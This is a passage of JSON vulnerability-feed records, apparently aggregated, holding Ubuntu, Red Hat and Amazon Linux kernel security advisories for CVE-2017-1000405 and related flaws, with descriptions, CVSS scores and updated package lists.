(CVE-2017-1000405)", "edition": 7, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-2", "href": "https://ubuntu.com/security/notices/USN-3510-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3511-1", "href": "https://ubuntu.com/security/notices/USN-3511-1", "title": "Linux kernel (Azure) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3508-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu \n16.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 5, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-2", "href": "https://ubuntu.com/security/notices/USN-3508-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-1", "href": "https://ubuntu.com/security/notices/USN-3508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a \nregression that prevented the Ceph network filesystem from being \nused. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-4", "href": "https://ubuntu.com/security/notices/USN-3509-4", "title": "Linux kernel (Xenial HWE) regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-2", "href": "https://ubuntu.com/security/notices/USN-3509-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. Unfortunately, it also introduced a regression that prevented the \nCeph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-3", "href": "https://ubuntu.com/security/notices/USN-3509-3", "title": "Linux kernel regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-1", "href": "https://ubuntu.com/security/notices/USN-3509-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15306", "CVE-2017-15299", "CVE-2017-12193", "CVE-2017-15951", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nEric Biggers discovered that the key management subsystem in the Linux \nkernel did not properly restrict adding a key that already exists but is \nuninstantiated. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-15299)\n\nIt was discovered that a null pointer dereference error existed in the \nPowerPC KVM implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-15306)\n\nEric Biggers discovered a race condition in the key management subsystem of \nthe Linux kernel around keys in a negative state. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15951)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3507-2", "href": "https://ubuntu.com/security/notices/USN-3507-2", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195", "CVE-2017-1000405"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. (CVE-2017-1000405)\n\nRed Hat would like to thank Eylon Ben Yaakov and Daniel Shapiro for reporting this issue.\n\nBug Fix(es):\n\n* Previously, Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package, did not support turning off transactional memory (TM) on the POWER9 systems. With this update it is now possible to turn off TM on the POWER9 systems. (BZ#1509974)\n\n* Due to a bug in the ixgbe and i40e drivers, the socket buffer list (skb list) in some cases got corrupted when running Red Hat Enterprise Linux 7.4 with the kernel version provided by the kernel-alt package on the POWER9 systems. Consequently, a kernel panic occurred. This update fixes ixgbe and i40e, and the kernel no longer panics due to this behavior. (BZ#1518412)\n\n* Users can lower the max_sectors_kb setting in the sysfs file system to accommodate certain workloads. Previously, users needed to set the maximum I/O size to either the block layer default or the optional preferred I/O size reported by the device. This update fixes the scsi driver to keep the current heuristic function for the initial setting of max_sectors_kb. As a result, for subsequent invocations, the driver now only updates the current queue limit if it exceeds the capabilities of the hardware. (BZ#1518432)\n\n* When performing full-bootme tests on Boston ESS systems running Red Hat Enterprise Linux 7.4 with the kernel version provided in the kernel-alt package, a kernel panic occurred and the operating system dropped into the XMON software. This update fixes the Multi-Queue Block IO Queueing Mechanism (blk-mq), and the kernel no longer panics in these circumstances. (BZ#1518433)\n\n* When running the stress test on the file system with the gssstress command, and pulling one disk from one recovery group, \"kernel I/O error\" was reported, and gssstress became unresponsive. Gssstress now works as expected under the described circumstances. (BZ#1522645)\n\n* When using the fwupdate_xl710 utility to apply updates for NVM Intel Ethernet Converged Network Adapter XL710 on machines running Red Hat Enterpise Linux 7.4 with the kernel version provided in the kernel-alt package, a deadlock sometimes occurred when the i40e driver was acquiring access to the Non-Volatile Memory (NVM) of the device. Consequently, NVM acquire timeouts occurred, the firmware update failed with the following error message: \"Failed Acquiring NVM resource for read err=-53 status=0xa\", and left the device's memory in a corrupted state. This update fixes the i40e driver, and the firmware updates no longer fail due to this behavior. (BZ#1522843)\n\n* Previously, on POWER9 systems with more than 100 Pstates, the cpufreq driver did not handle the cases when the NxN matrix denominated transition table (trans_table) overflowed beyond the PAGE_SIZE boundary correctly. Consequently, reading trans_table for any of the CPUs failed with the following error:\n\n\"fill_read_buffer: show+0x0/0xa0 returned bad count\"\n\nWith this update reading trans_table for any of the CPUs now proceeds as expected under the described circumstances. (BZ#1522844)\n\n* Previously, the /sys/firmware/opal/exports directory did not contain an export node. Consequently, a range of memory in the Open Power Abstraction Layer (OPAL) that the operating system attempted to export to user space for debugging purposes was not available. With this update the sysfs file under /sys/firmware/opal/exports is now available for each property found there, and this file can be used for debugging purposes. (BZ#1522845)", "modified": "2018-03-19T16:23:48", "published": "2018-01-25T15:47:54", "id": "RHSA-2018:0180", "href": "https://access.redhat.com/errata/RHSA-2018:0180", "type": "redhat", "title": "(RHSA-2018:0180) Important: kernel-alt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7913", "CVE-2016-8633", "CVE-2017-1000407", "CVE-2017-11600", "CVE-2017-12190", "CVE-2017-13215", "CVE-2017-16939", "CVE-2017-17558", "CVE-2018-1068", "CVE-2018-12126", "CVE-2018-12127", "CVE-2018-12130", "CVE-2018-18559", "CVE-2018-3665", "CVE-2019-11091"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. (CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)", "modified": "2019-05-14T22:49:05", "published": "2019-05-14T22:09:09", "id": "RHSA-2019:1170", "href": "https://access.redhat.com/errata/RHSA-2019:1170", "type": "redhat", "title": "(RHSA-2019:1170) Important: kernel security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-17741", "CVE-2018-1000028", "CVE-2018-5344", "CVE-2016-5195", "CVE-2018-5750", "CVE-2017-1000405"], "description": "**Issue Overview:**\n\nStack-based out-of-bounds read via vmcall instruction \nLinux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.([CVE-2017-17741 __](<https://access.redhat.com/security/cve/CVE-2017-17741>))\n\ndrivers/block/loop.c mishandles lo_release serialization allowing denial-of-service \nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions. ([CVE-2018-5344 __](<https://access.redhat.com/security/cve/CVE-2018-5344>))\n\npmd can become dirty without going through a COW cycle \nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nImproper sorting of GIDs in nfsd can lead to incorrect permissions being applied \nLinux kernel contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the "rootsquash" options enabled. This vulnerability appears to have been fixed in after commit 1995266727fa. ([CVE-2018-1000028 __](<https://access.redhat.com/security/cve/CVE-2018-1000028>))\n\nKernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass \nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.([CVE-2018-5750 __](<https://access.redhat.com/security/cve/CVE-2018-5750>))\n\nSpeculative execution bounds-check bypass \nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant [CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>) triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.([CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n kernel-doc-4.9.81-44.57.amzn2.noarch \n \n src: \n kernel-4.9.81-44.57.amzn2.src \n \n x86_64: \n kernel-4.9.81-44.57.amzn2.x86_64 \n kernel-headers-4.9.81-44.57.amzn2.x86_64 \n kernel-debuginfo-common-x86_64-4.9.81-44.57.amzn2.x86_64 \n perf-4.9.81-44.57.amzn2.x86_64 \n perf-debuginfo-4.9.81-44.57.amzn2.x86_64 \n python-perf-4.9.81-44.57.amzn2.x86_64 \n python-perf-debuginfo-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-devel-4.9.81-44.57.amzn2.x86_64 \n kernel-tools-debuginfo-4.9.81-44.57.amzn2.x86_64 \n kernel-devel-4.9.81-44.57.amzn2.x86_64 \n kernel-debuginfo-4.9.81-44.57.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2018-02-20T21:23:00", "published": "2018-02-20T21:23:00", "id": "ALAS2-2018-956", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-956.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5753", "CVE-2017-17741", "CVE-2018-1000028", "CVE-2018-5344", "CVE-2016-5195", "CVE-2018-5750", "CVE-2017-1000405"], "description": "**Issue Overview:**\n\nKernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass \nThe acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel, through 4.14.15, allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.([CVE-2018-5750 __](<https://access.redhat.com/security/cve/CVE-2018-5750>))\n\nImproper sorting of GIDs in nfsd can lead to incorrect permissions being applied \nLinux kernel contains a Incorrect Access Control vulnerability in NFS server (nfsd) that can result in remote users reading or writing files they should not be able to via NFS. This attack appear to be exploitable via NFS server must export a filesystem with the "rootsquash" options enabled. This vulnerability appears to have been fixed in after commit 1995266727fa.([CVE-2018-1000028 __](<https://access.redhat.com/security/cve/CVE-2018-1000028>))\n\nStack-based out-of-bounds read via vmcall instruction \nLinux kernel compiled with the KVM virtualization (CONFIG_KVM) support is vulnerable to an out-of-bounds read access issue. It could occur when emulating vmcall instructions invoked by a guest. A guest user/process could use this flaw to disclose kernel memory bytes.([CVE-2017-17741 __](<https://access.redhat.com/security/cve/CVE-2017-17741>))\n\nThe pmd can become dirty without going through a COW cycle \nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nSpeculative execution bounds-check bypass \nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant [CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>) triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks.([CVE-2017-5753 __](<https://access.redhat.com/security/cve/CVE-2017-5753>))\n\ndrivers/block/loop.c mishandles lo_release serialization allowing denial-of-service \nA flaw was found in the Linux kernel's handling of loopback devices. An attacker, who has permissions to setup loopback disks, may create a denial of service or other unspecified actions. ([CVE-2018-5344 __](<https://access.redhat.com/security/cve/CVE-2018-5344>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.9.81-35.56.amzn1.i686 \n kernel-devel-4.9.81-35.56.amzn1.i686 \n 